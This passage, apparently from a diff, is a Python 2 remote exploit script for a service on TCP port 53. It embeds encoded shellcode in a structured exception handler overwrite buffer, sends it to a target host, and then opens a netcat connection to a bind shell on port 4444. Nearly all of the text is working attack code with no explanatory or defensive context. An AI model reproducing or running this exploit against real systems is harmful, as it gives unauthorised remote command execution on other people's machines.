+"\x56\x31\x45\x13\x83\xed\xfc\x03\x45\xd0\x86\xf1\xd5\x06\xcf" +"\xfa\x25\xd6\xb0\x73\xc0\xe7\xe2\xe0\x80\x55\x33\x62\xc4\x55" +"\xb8\x26\xfd\xee\xcc\xee\xf2\x47\x7a\xc9\x3d\x58\x4a\xd5\x92" +"\x9a\xcc\xa9\xe8\xce\x2e\x93\x22\x03\x2e\xd4\x5f\xeb\x62\x8d" +"\x14\x59\x93\xba\x69\x61\x92\x6c\xe6\xd9\xec\x09\x39\xad\x46" +"\x13\x6a\x1d\xdc\x5b\x92\x16\xba\x7b\xa3\xfb\xd8\x40\xea\x70" +"\x2a\x32\xed\x50\x62\xbb\xdf\x9c\x29\x82\xef\x11\x33\xc2\xc8" +"\xc9\x46\x38\x2b\x74\x51\xfb\x51\xa2\xd4\x1e\xf1\x21\x4e\xfb" +"\x03\xe6\x09\x88\x08\x43\x5d\xd6\x0c\x52\xb2\x6c\x28\xdf\x35" +"\xa3\xb8\x9b\x11\x67\xe0\x78\x3b\x3e\x4c\x2f\x44\x20\x28\x90" +"\xe0\x2a\xdb\xc5\x93\x70\xb4\x2a\xae\x8a\x44\x24\xb9\xf9\x76" +"\xeb\x11\x96\x3a\x64\xbc\x61\x3c\x5f\x78\xfd\xc3\x5f\x79\xd7" +"\x07\x0b\x29\x4f\xa1\x33\xa2\x8f\x4e\xe6\x65\xc0\xe0\x58\xc6" +"\xb0\x40\x08\xae\xda\x4e\x77\xce\xe4\x84\x0e\xc8\x2a\xfc\x43" +"\xbf\x4e\x02\x72\x63\xc6\xe4\x1e\x8b\x8e\xbf\xb6\x69\xf5\x77" +"\x21\x91\xdf\x2b\xfa\x05\x57\x22\x3c\x29\x68\x60\x6f\x86\xc0" +"\xe3\xfb\xc4\xd4\x12\xfc\xc0\x7c\x5c\xc5\x83\xf7\x30\x84\x32" +"\x07\x19\x7e\xd6\x9a\xc6\x7e\x91\x86\x50\x29\xf6\x79\xa9\xbf" +"\xea\x20\x03\xdd\xf6\xb5\x6c\x65\x2d\x06\x72\x64\xa0\x32\x50" +"\x76\x7c\xba\xdc\x22\xd0\xed\x8a\x9c\x96\x47\x7d\x76\x41\x3b" +"\xd7\x1e\x14\x77\xe8\x58\x19\x52\x9e\x84\xa8\x0b\xe7\xbb\x05" +"\xdc\xef\xc4\x7b\x7c\x0f\x1f\x38\x8c\x5a\x3d\x69\x05\x03\xd4" +"\x2b\x48\xb4\x03\x6f\x75\x37\xa1\x10\x82\x27\xc0\x15\xce\xef" +"\x39\x64\x5f\x9a\x3d\xdb\x60\x8f" +) + +nSEH = '\xeb\x06\x90\x90' +SEH = '\xd1\x07\xfc\x7f' +opcode = "\xe9\xdf\xf6\xff\xff" +junk = 'A' * (2324 - len(shellcode)) +padding = 'A' * 600 + +buff = shellcode + junk + nSEH + SEH + opcode + padding + +print "[+] Connecting to %s:53" % (host) +try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((host, 53)) + aix= shellcode + 'A' * (2324 - len(shellcode)) + print "[*] Sending payload.." + " shellcode: " + str(len(shellcode)) + s.send(buff) + print "[*] Exploit Sent Successfully!" + s.close() + print "[+] Waiting for 5 sec before spawning shell to " + host + ":4444\r" + time.sleep(5) + os.system ("nc -n " + host + " 4444") +except: + print "[!] Could not connect to " + host + ":53\r" + sys.exit(0)